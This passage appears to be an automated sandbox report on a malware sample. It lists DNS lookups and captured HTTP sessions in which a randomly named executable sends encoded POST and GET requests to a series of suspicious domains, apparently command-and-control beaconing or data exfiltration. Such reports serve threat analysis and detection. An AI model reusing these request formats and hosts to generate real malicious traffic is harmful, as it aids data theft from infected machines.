                                                                                              Oct 8, 2024 15:54:31.444658995 CEST1.1.1.1192.168.2.60x8254No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:44.822880030 CEST1.1.1.1192.168.2.60x51fcNo error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:44.822880030 CEST1.1.1.1192.168.2.60x51fcNo error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:58.351511002 CEST1.1.1.1192.168.2.60xaf3aNo error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:54:58.351511002 CEST1.1.1.1192.168.2.60xaf3aNo error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:11.691231012 CEST1.1.1.1192.168.2.60xff10No error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:25.958050013 CEST1.1.1.1192.168.2.60x5c7cNo error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:39.943692923 CEST1.1.1.1192.168.2.60xe706No error (0)www.nobartv6.website103.224.182.242A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:54.771203041 CEST1.1.1.1192.168.2.60x4af6No error (0)www.sailnway.netredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:54.771203041 CEST1.1.1.1192.168.2.60x4af6No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 15:55:54.771203041 CEST1.1.1.1192.168.2.60x4af6No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.elsupertodo.net
                                                                                              • www.omexai.info
                                                                                              • www.tekilla.wtf
                                                                                              • www.bola88site.one
                                                                                              • www.languagemodel.pro
                                                                                              • www.kexweb.top
                                                                                              • www.jobworklanka.online
                                                                                              • www.dyme.tech
                                                                                              • www.mizuquan.top
                                                                                              • www.nobartv6.website

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.649932148.72.152.174802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:20.457938910 CEST568OUTGET /2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.elsupertodo.net
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:53:20.977030039 CEST551INHTTP/1.1 301 Moved Permanently
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:53:20 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 162
                                                                                              Connection: close
                                                                                              Location: https://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4=
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.6499853.33.130.190802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:36.095050097 CEST814OUTPOST /7xi5/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.omexai.info
                                                                                              Origin: http://www.omexai.info
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.omexai.info/7xi5/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 79 6a 62 61 2f 72 2f 51 76 44 6b 47 77 4d 70 6e 6b 78 36 6f 6c 57 6d 45 72 30 48 41 54 79 45 30 54 6e 36 79 4c 6c 66 34 6d 6e 33
                                                                                              Data Ascii: I4ET5=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5yjba/r/QvDkGwMpnkx6olWmEr0HATyE0Tn6yLlf4mn3


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.6499863.33.130.190802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:38.635107994 CEST838OUTPOST /7xi5/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.omexai.info
                                                                                              Origin: http://www.omexai.info
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.omexai.info/7xi5/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 32 6b 45 70 73 31 41 7a 79 75 32 54 66 36 67 63 70 34 33 53 43 55 68 31 4e 74 59 47 5a 33 50 2b 61 61 4f 36 30 2f 6f 41 47 64 35 51 3d 3d
                                                                                              Data Ascii: I4ET5=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ612kEps1Azyu2Tf6gcp43SCUh1NtYGZ3P+aaO60/oAGd5Q==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.6499873.33.130.190802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:41.231118917 CEST1851OUTPOST /7xi5/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.omexai.info
                                                                                              Origin: http://www.omexai.info
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.omexai.info/7xi5/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 4c 42 4f 43 55 30 6e 58 46 79 6e 6a 75 51 59 37 6b 33 4c 30 71 63 35 77 7a 31 7a 4e 31 63 2f 51 53 72 6d 78 64 42 61 31 4e 7a 5a 6f 6d 75 4f 50 70 76 69 6b 48 48 6c 53 7a 31 7a 43 74 57 43 38 71 69 6b 4d 72 33 64 71 62 31 73 74 45 2f 4f 4d 62 35 4f 4c 2f 67 72 46 2f 54 61 31 2f 6d 75 69 53 39 44 32 6e 65 6e 39 51 35 45 76 53 78 33 65 68 35 43 52 37 45 6f 4f 74 65 67 30 6a 76 45 79 32 37 4b 45 4c 79 35 69 59 45 70 47 51 6f 64 33 79 74 45 59 67 35 2b 65 37 71 70 75 70 36 78 32 32 39 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoLBOCU0nXFynjuQY7k3L0qc5wz1zN1c/QSrmxdBa1NzZomuOPpvikHHlSz1zCtWC8qikMr3dqb1stE/OMb5OL/grF/Ta1/muiS9D2nen9Q5EvSx3eh5CR7EoOteg0jvEy27KELy5iYEpGQod3ytEYg5+e7qpup6x229AqQlAMC+jacFtYWXU4clqkMEV73/Q+nk7q47785PCOfZdJFsNy7Zab+34CqItxedCgdYDkPcXpS1dK805jy5mtIdtpceAn1luRcJx17X2BLl8RyRnNhD23mos1x3c2HgfwK52OI2y73bJyinRA4QesdNuG95UAdXyk6tqXnwqf92OJxirc3ze2UCl0HQ7cqbUP8dUBS9hwU5XnKZfvhsglGBObB4wKEKeGVT4DKaYB1rs3osPO3CAiWnwQBw/UD3pwrEZKK00znmDh5p0S8m+JXloYrybu3eqRfMH1oUBWD5WwDq0CjT04ZSzNPAOc32YjckWWlz5A2f8sy1QHh75nofHbeNgci9y0PWTE1azk3mCmJsFGg+ko2CkVx5uZyzzekOOohmDINttOLbwISqx9PEe/cnhvuGYhCYOoUp32aq9lvgpu8a9rIxdsUC6yhvrX8tqfeA+mDiJMu5EqxilJJNpvCeXX6i8+TnnarSrdm5YsFcBiuAEbti/+0lKX1Vti4NNstam/6ztKLWuXxkjmnNSRaFxgoL6GkIrbgqOW5XwQr7P/NNnr/yXDxMy2T9htZhlNO3PMMKqsRoZDAHdsomm5XRUNX7tLzJVoipsq0OZ8cEkRFzjjaUm3kZeqyGoEfrF+pO2OOt8Nj66oXCcVeAREljmk2lED [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.6499883.33.130.190802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:43.798047066 CEST564OUTGET /7xi5/?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.omexai.info
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:53:45.163804054 CEST414INHTTP/1.1 200 OK
                                                                                              Server: openresty
                                                                                              Date: Tue, 08 Oct 2024 13:53:45 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 274
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 34 45 54 35 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 41 7a 2f 37 50 41 62 73 70 47 48 59 72 4a 68 77 69 41 67 4b 41 4a 35 34 72 35 66 75 5a 34 38 59 65 43 4a 4a 4c 41 68 30 6a 66 4e 4d 55 79 4a 68 69 71 77 3d 26 35 78 6e 30 33 3d 37 76 4d 78 32 48 6c 50 57 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl"}</script></head></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.649990172.191.244.62802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:50.659717083 CEST814OUTPOST /fpzw/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.tekilla.wtf
                                                                                              Origin: http://www.tekilla.wtf
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.tekilla.wtf/fpzw/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 52 6c 79 65 46 6d 39 77 39 36 76 6c 6e 51 73 6c 41 33 64 4e 47 4e 43 37 39 38 6c 71 6b 35 70 55 76 6e 4c 33 36 4c 5a 32 65 2f 51
                                                                                              Data Ascii: I4ET5=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaRlyeFm9w96vlnQslA3dNGNC798lqk5pUvnL36LZ2e/Q
                                                                                              Oct 8, 2024 15:53:51.143800974 CEST195INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Date: Tue, 08 Oct 2024 13:53:51 GMT
                                                                                              Content-Length: 19
                                                                                              Connection: close
                                                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                              Data Ascii: 404 page not found


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.649992172.191.244.62802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:53.198024035 CEST838OUTPOST /fpzw/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.tekilla.wtf
                                                                                              Origin: http://www.tekilla.wtf
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.tekilla.wtf/fpzw/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 74 41 37 2f 6b 58 71 45 35 44 57 76 66 4c 6c 74 48 2b 35 71 61 7a 53 51 66 6d 73 70 65 52 32 67 74 62 51 69 59 45 36 5a 72 50 53 77 3d 3d
                                                                                              Data Ascii: I4ET5=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWtA7/kXqE5DWvfLltH+5qazSQfmspeR2gtbQiYE6ZrPSw==
                                                                                              Oct 8, 2024 15:53:53.660002947 CEST195INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Date: Tue, 08 Oct 2024 13:53:53 GMT
                                                                                              Content-Length: 19
                                                                                              Connection: close
                                                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                              Data Ascii: 404 page not found


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.649993172.191.244.62802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:55.749417067 CEST1851OUTPOST /fpzw/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.tekilla.wtf
                                                                                              Origin: http://www.tekilla.wtf
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.tekilla.wtf/fpzw/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 6d 6b 38 32 55 79 67 6a 76 79 64 67 35 6b 6b 76 38 43 76 68 78 64 53 2b 7a 44 74 73 69 4e 38 2b 65 74 53 48 62 72 67 71 65 63 33 68 74 45 50 43 4a 76 34 4a 2b 34 50 34 67 33 32 6f 61 52 47 52 57 59 6a 68 34 61 58 6c 61 53 6b 6a 4f 44 65 59 37 77 6b 59 35 54 52 4d 50 71 33 64 44 79 30 76 41 62 45 4b 69 43 75 6a 67 4b 5a 37 59 6d 61 75 4f 71 48 6f 4c 66 36 30 36 63 57 69 79 4b 47 52 36 4f 2b 69 67 31 42 78 53 2f 79 5a 64 64 6f 4f 7a 4f 6a 67 31 69 69 74 33 63 72 39 6e 36 2f 7a 34 56 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcmk82Uygjvydg5kkv8CvhxdS+zDtsiN8+etSHbrgqec3htEPCJv4J+4P4g32oaRGRWYjh4aXlaSkjODeY7wkY5TRMPq3dDy0vAbEKiCujgKZ7YmauOqHoLf606cWiyKGR6O+ig1BxS/yZddoOzOjg1iit3cr9n6/z4VC7rBa7iqhirqVTjtVBMJNbS/trGYPXpiHc2WjfVdPy+8TPR5o/n2iPr0g6ro3s2iw0TiLiIM3R6X/I/CB4EJxfyakS+gwGyEV9KZRJQnCu4crdRBBKXJvXhsMODO2XZfjrS8oR5Tib7R+6DA8MEXOvMzGJ0+RhDk5BdTuLx/M7kaZd+eN0wuvLtfv1DusInND7MEOdUzWNwFSSxPB40vBfo4+UpYtwS811tmLrpVyJ1iRz07izfKYyYN+65Tmm+QT/kzVWrXczUxatWAplxqFBlwjkjXAUZNrrD6ZVSM6FEVY3dI0wjECxifgzsJEUGD3aeW/lBi23EaAJ5liYXXetLbj9XskXzlTwiQ9XtrO7J9okzyr7Rjsb1VhNbvT4GGIcqBxI405ombIrp0jj1h6PkpqSFlUmhmFA9rj7QrYofKZtfXVeOlxCmF0PFvs8FRBVdVwgXTp1C97VM/DpUkbbwe0GXXTRGGxmvK9CGm1hVXHQBwZvzyN534IPU7PrfUMh7ld7ChfHJwIm5Rw/Jm583Ob/wcjPmBwLlwGvHME93LcV5Gawrhib/MZmYzqyFx1Z6gM8LfpCprOGWMPc2TkNNMjBFtZBR7pXLwmxp/3ZVKQ/+4hdSfIegdCAipIoxo8CNG0B59BNitIoD5f5EFrFuA9onOj9Rg3H [TRUNCATED]
                                                                                              Oct 8, 2024 15:53:56.364268064 CEST195INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Date: Tue, 08 Oct 2024 13:53:56 GMT
                                                                                              Content-Length: 19
                                                                                              Connection: close
                                                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                              Data Ascii: 404 page not found


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
